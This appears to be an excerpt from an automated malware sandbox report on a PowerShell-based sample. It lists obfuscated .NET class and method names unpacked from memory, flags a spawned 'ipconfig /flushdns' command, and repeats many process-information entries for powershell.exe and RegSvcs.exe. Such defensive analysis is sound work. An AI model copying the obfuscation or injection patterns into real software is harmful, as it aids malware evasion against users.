              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, b02VErUOAyp7KgsN3bFDF2auprIqAGCLaGMp.csHigh entropy of concatenated method names: 'INkezmr6hizs7DYFjV4aAMMuO4B8vcIzpRzl', '_1UgweADLCOTyFcav1bCSPpZmBT2YjbCvAU2a', 'N38ShQwEPMzDIeuhJy4EphCuYO22ULsDR4AR', 'VQJXMcVFd751mpqtfhNss', 'MoXo9dtjQWauKcR4tF0QZ', '_9KThUWSyhPoAhybqdEEGn', 'ZOGHWakUiTGxpDEMxkgVq', 'VbdrNDJi8xPxLw2mCoL5G', 'ZDOPOAfhNiZba9q2wF0zk', 'gLT3eh2G9sbPPYX5MS02M'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, ecfzk1BLTMVYPDpfIlTKGWKme1YqqZGoyQ7Vc33TJphCOCCj76EqW1abpBIyhIQ4ZDwplcAJv1P6YGgTLqEZyNFN0Yjag.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'aBhmG8hesQRZx5swb8QklvJR7WenRTLT4PpJ', 'J3SeuSTYALTr3yfRGGRIng8jjRcOlYfMvoE8', 'EoOkNZdPQEWcWFnAib8PkZw6yS7hompPojzR', 'FJElkQ5aMB1hwH9O2Q9GR2Cz4GaNeyxzx8iv'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.csHigh entropy of concatenated method names: 'ACdeIzXseyPo4zWqWy02RazcDiWaeYEF3sMU', 'KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K', 'N1sexz3RI1DpSUs8sFctRkct2k71o6Dw5adn', 'UqsaOcNK4UPWrSnz315O3fHPN7hmKXXzM5ek', 'JVZHi2GrdZvpd6rLMCYrVVcMGmoHeoBq6p3H', 'pyZ9AMn9R81CWO7jWKyfev1oi7ghwwdSnb3i', 'qZ6RmsuveDKUm2nZ6abIPK0CPfRROfax8QwG', 'NKRNz1jRg2dg9416sbsJ9O1Prxh7Ujl233zE', 'ai8NTPVbOPHKdfOoapJOEteWyRNHxMPPWDhT', 'NvDSL0KgPKbgoTgffwjCGHfA0D7JbHNtdeDP'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.csHigh entropy of concatenated method names: 'Vl7IYPbs0k94qffFzhKGetVhWAXE2DuwFW3Z', '_0Byrd5Yenv0fM67D8WjMm', 'FTmqyKQFF2nZLlpTlQxHj', 'ycVPE2G11CcWkNNNsiscT', '_1Ou3AbDogGuZOToO0DEh1'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, tSBhnwvdpxEXyJxA8lGv4Bgp4p8TME6qQQXq.csHigh entropy of concatenated method names: 'NxpU6fdmEe350QRzSjmBG9bNgqiTmTVt3HvB', '_0iGLzTupk4oCtdljtdO0J', 'GH26cbm9WLUxhV866JkHg', '_41oPTrdIImlCUF6BZDilb', 'sy473pUm38ZS8xSNy8qaL'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csHigh entropy of concatenated method names: 'J8wHw2osnqTKiwkc3AZR8dJNxdbogdSKtxmF', 'qRcvRLsx0rxBIjhYsY9PC5vCWjsb8g2zuOH7', 'hLvrRQnXSt6R0bWy2ezji7tuxQIXN8qZ0RVf', 'ceHhszv7a2pCt2179HvaC23Hie2toqek6kQm', 'rMQUqeCYVWFCeYXZemrUiFJninSg7w4dNwcp', 'w5OdajmqiE1M7BW3IMdtUvegP99kuNYpO8vy', 'BjIxTPFBlXVTDrgqc7l5EYgWBO9QbMzlkizN', 'Su3QHI7NRcYJwIpsPYz5ohtFr2qfwzPcRLZJ', 'vABejWKfbSdGkHO9pNjXKLu0vDNBKiHgCRXA', '_5rpp77KCzZlHIngjWeMz70hTryBV4kjkB21s'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, Ovf0N5CQI1OINhI7lGry0rZm9kRY1ouImX1rRJDUauSsRBy7XEy1Vt7xi5mHlsT56DNCiId2YJlUZmsE23x0zAxkvKtDD.csHigh entropy of concatenated method names: 'U5sr0xpHdPhDSSbzFhxVIzRWeUyjHKaz7fC1kB0zXHJhnGI0CUd6SU5JrE3jDkMuJaZ7EPji9ym2R2XoRsaHYn1rH30jX', '_1uaG3Jmqcbu2z3C6aXj7JDQp2ADrLzHvGZEbDAKFqxfCBIw8pqHWCSMAzwDlV7JEVIKw2jbg6Y6KWsHnPlqFhGkgkWgUO', 'zQW9aPhZQcTvVUKWPGF2Lx6BnGfcxuOWukqHMV5NabLvy73gvdWFFJrw8wap5tuyfzFK81X3Lcq2tDHNKzdH2wLMcfc6J', '_4evsVFwMgy4n0x0cZfFsT', 'bqSHGcZwiXLgYoIjsUGSg', 'Wgka3ShlAx39hjLg9aMl6', '_1GVuR1tPkrWg5WEjE8zNi', 'Gf4QevTLf6VvSRMQTyTwD', 'pLeUDmoCnx132zeKo40LY', 'OnEtj15FfkoF6zFGMzPj9'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csHigh entropy of concatenated method names: 'xIeDGhWJh2dTLJj2KIKIkFlXgJ7yVJFMa5ZsnMElaczn389Ab5jcRZjYkKt4ktw9FQNKLIiNSjxfAYBeFydeIuEsxRDU0', 'iidSY7kDOs5FStDZNmRMEjt7glMgsaLCx80cm1y6v2rBQX100VXnfdgl8ByYbIq1ko8jZmN3f7W1XVjrN27WQa2rilPm8', 'FExflqz2ggYzAB8RkhZzQMhxx6cV08pL74aeNkOLC16P1A5u4mPbh4a9MT8ExggxPZvlSo1Qtx8QnVUuKM1ZGz1xvvbVE', 'GrEs6aQJtRM5DVNA9OStPBAI69B70MrCQV4OAAGaHOcugd3H2svSK0xh9ENhsIxRZzNDGBo079U7lkA0mxcejrA46fvwu', 'jXQ7CW5pazCc1V0AEwdp5SnRJDYF7u5sZpU1n9bZRSjgDRix2AIbxFkub0H4SD8hHRAob5vbVGbs5kHrIA0a7heeGQbl7', 'glsn8zXWNedoYiCWR7ggZIm7mZY5mNmOoEyXSr6Gd9iu88DRgb03GoD5Jw1HVc9eduqMCd7d76L4cERmtSvnznvJHtpF0', 'iccNNeoF51wTxbpATnVFbAdt8d8MulXIqrA55pnFvGlLeEqiiqogIHyvrrBCs4jIsjlfOXE0IFpBmAe8fJwMIuIbeX9Kf', 'jZpp5aIkL5DUHdMmI7HQBPJ6EmvQxikeAD4IAgyMBLIyLX0x1fcGkG6MTlxst0p7C61krxBu4e1dGyIgXSrjFGo1hTvqR', 'pXBe9HFDtAdZotphcgbdt1jtfMAXkED5dptTH1HtOoBwh5VCyGpNPIeDaGpQRtHO5QEcup2bma2XS7Ndj7k2FVaPEumb1', 'Q1EltKwM1R3yq1zXEHilAmDHGT4S5fhl21UG'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, b02VErUOAyp7KgsN3bFDF2auprIqAGCLaGMp.csHigh entropy of concatenated method names: 'INkezmr6hizs7DYFjV4aAMMuO4B8vcIzpRzl', '_1UgweADLCOTyFcav1bCSPpZmBT2YjbCvAU2a', 'N38ShQwEPMzDIeuhJy4EphCuYO22ULsDR4AR', 'VQJXMcVFd751mpqtfhNss', 'MoXo9dtjQWauKcR4tF0QZ', '_9KThUWSyhPoAhybqdEEGn', 'ZOGHWakUiTGxpDEMxkgVq', 'VbdrNDJi8xPxLw2mCoL5G', 'ZDOPOAfhNiZba9q2wF0zk', 'gLT3eh2G9sbPPYX5MS02M'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, ecfzk1BLTMVYPDpfIlTKGWKme1YqqZGoyQ7Vc33TJphCOCCj76EqW1abpBIyhIQ4ZDwplcAJv1P6YGgTLqEZyNFN0Yjag.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'aBhmG8hesQRZx5swb8QklvJR7WenRTLT4PpJ', 'J3SeuSTYALTr3yfRGGRIng8jjRcOlYfMvoE8', 'EoOkNZdPQEWcWFnAib8PkZw6yS7hompPojzR', 'FJElkQ5aMB1hwH9O2Q9GR2Cz4GaNeyxzx8iv'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.csHigh entropy of concatenated method names: 'ACdeIzXseyPo4zWqWy02RazcDiWaeYEF3sMU', 'KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K', 'N1sexz3RI1DpSUs8sFctRkct2k71o6Dw5adn', 'UqsaOcNK4UPWrSnz315O3fHPN7hmKXXzM5ek', 'JVZHi2GrdZvpd6rLMCYrVVcMGmoHeoBq6p3H', 'pyZ9AMn9R81CWO7jWKyfev1oi7ghwwdSnb3i', 'qZ6RmsuveDKUm2nZ6abIPK0CPfRROfax8QwG', 'NKRNz1jRg2dg9416sbsJ9O1Prxh7Ujl233zE', 'ai8NTPVbOPHKdfOoapJOEteWyRNHxMPPWDhT', 'NvDSL0KgPKbgoTgffwjCGHfA0D7JbHNtdeDP'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.csHigh entropy of concatenated method names: 'Vl7IYPbs0k94qffFzhKGetVhWAXE2DuwFW3Z', '_0Byrd5Yenv0fM67D8WjMm', 'FTmqyKQFF2nZLlpTlQxHj', 'ycVPE2G11CcWkNNNsiscT', '_1Ou3AbDogGuZOToO0DEh1'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, tSBhnwvdpxEXyJxA8lGv4Bgp4p8TME6qQQXq.csHigh entropy of concatenated method names: 'NxpU6fdmEe350QRzSjmBG9bNgqiTmTVt3HvB', '_0iGLzTupk4oCtdljtdO0J', 'GH26cbm9WLUxhV866JkHg', '_41oPTrdIImlCUF6BZDilb', 'sy473pUm38ZS8xSNy8qaL'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csHigh entropy of concatenated method names: 'J8wHw2osnqTKiwkc3AZR8dJNxdbogdSKtxmF', 'qRcvRLsx0rxBIjhYsY9PC5vCWjsb8g2zuOH7', 'hLvrRQnXSt6R0bWy2ezji7tuxQIXN8qZ0RVf', 'ceHhszv7a2pCt2179HvaC23Hie2toqek6kQm', 'rMQUqeCYVWFCeYXZemrUiFJninSg7w4dNwcp', 'w5OdajmqiE1M7BW3IMdtUvegP99kuNYpO8vy', 'BjIxTPFBlXVTDrgqc7l5EYgWBO9QbMzlkizN', 'Su3QHI7NRcYJwIpsPYz5ohtFr2qfwzPcRLZJ', 'vABejWKfbSdGkHO9pNjXKLu0vDNBKiHgCRXA', '_5rpp77KCzZlHIngjWeMz70hTryBV4kjkB21s'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, Ovf0N5CQI1OINhI7lGry0rZm9kRY1ouImX1rRJDUauSsRBy7XEy1Vt7xi5mHlsT56DNCiId2YJlUZmsE23x0zAxkvKtDD.csHigh entropy of concatenated method names: 'U5sr0xpHdPhDSSbzFhxVIzRWeUyjHKaz7fC1kB0zXHJhnGI0CUd6SU5JrE3jDkMuJaZ7EPji9ym2R2XoRsaHYn1rH30jX', '_1uaG3Jmqcbu2z3C6aXj7JDQp2ADrLzHvGZEbDAKFqxfCBIw8pqHWCSMAzwDlV7JEVIKw2jbg6Y6KWsHnPlqFhGkgkWgUO', 'zQW9aPhZQcTvVUKWPGF2Lx6BnGfcxuOWukqHMV5NabLvy73gvdWFFJrw8wap5tuyfzFK81X3Lcq2tDHNKzdH2wLMcfc6J', '_4evsVFwMgy4n0x0cZfFsT', 'bqSHGcZwiXLgYoIjsUGSg', 'Wgka3ShlAx39hjLg9aMl6', '_1GVuR1tPkrWg5WEjE8zNi', 'Gf4QevTLf6VvSRMQTyTwD', 'pLeUDmoCnx132zeKo40LY', 'OnEtj15FfkoF6zFGMzPj9'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csHigh entropy of concatenated method names: 'xIeDGhWJh2dTLJj2KIKIkFlXgJ7yVJFMa5ZsnMElaczn389Ab5jcRZjYkKt4ktw9FQNKLIiNSjxfAYBeFydeIuEsxRDU0', 'iidSY7kDOs5FStDZNmRMEjt7glMgsaLCx80cm1y6v2rBQX100VXnfdgl8ByYbIq1ko8jZmN3f7W1XVjrN27WQa2rilPm8', 'FExflqz2ggYzAB8RkhZzQMhxx6cV08pL74aeNkOLC16P1A5u4mPbh4a9MT8ExggxPZvlSo1Qtx8QnVUuKM1ZGz1xvvbVE', 'GrEs6aQJtRM5DVNA9OStPBAI69B70MrCQV4OAAGaHOcugd3H2svSK0xh9ENhsIxRZzNDGBo079U7lkA0mxcejrA46fvwu', 'jXQ7CW5pazCc1V0AEwdp5SnRJDYF7u5sZpU1n9bZRSjgDRix2AIbxFkub0H4SD8hHRAob5vbVGbs5kHrIA0a7heeGQbl7', 'glsn8zXWNedoYiCWR7ggZIm7mZY5mNmOoEyXSr6Gd9iu88DRgb03GoD5Jw1HVc9eduqMCd7d76L4cERmtSvnznvJHtpF0', 'iccNNeoF51wTxbpATnVFbAdt8d8MulXIqrA55pnFvGlLeEqiiqogIHyvrrBCs4jIsjlfOXE0IFpBmAe8fJwMIuIbeX9Kf', 'jZpp5aIkL5DUHdMmI7HQBPJ6EmvQxikeAD4IAgyMBLIyLX0x1fcGkG6MTlxst0p7C61krxBu4e1dGyIgXSrjFGo1hTvqR', 'pXBe9HFDtAdZotphcgbdt1jtfMAXkED5dptTH1HtOoBwh5VCyGpNPIeDaGpQRtHO5QEcup2bma2XS7Ndj7k2FVaPEumb1', 'Q1EltKwM1R3yq1zXEHilAmDHGT4S5fhl21UG'

              Persistence and Installation Behavior

              barindex
              Uses ipconfig to lookup or modify the Windows network settings
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
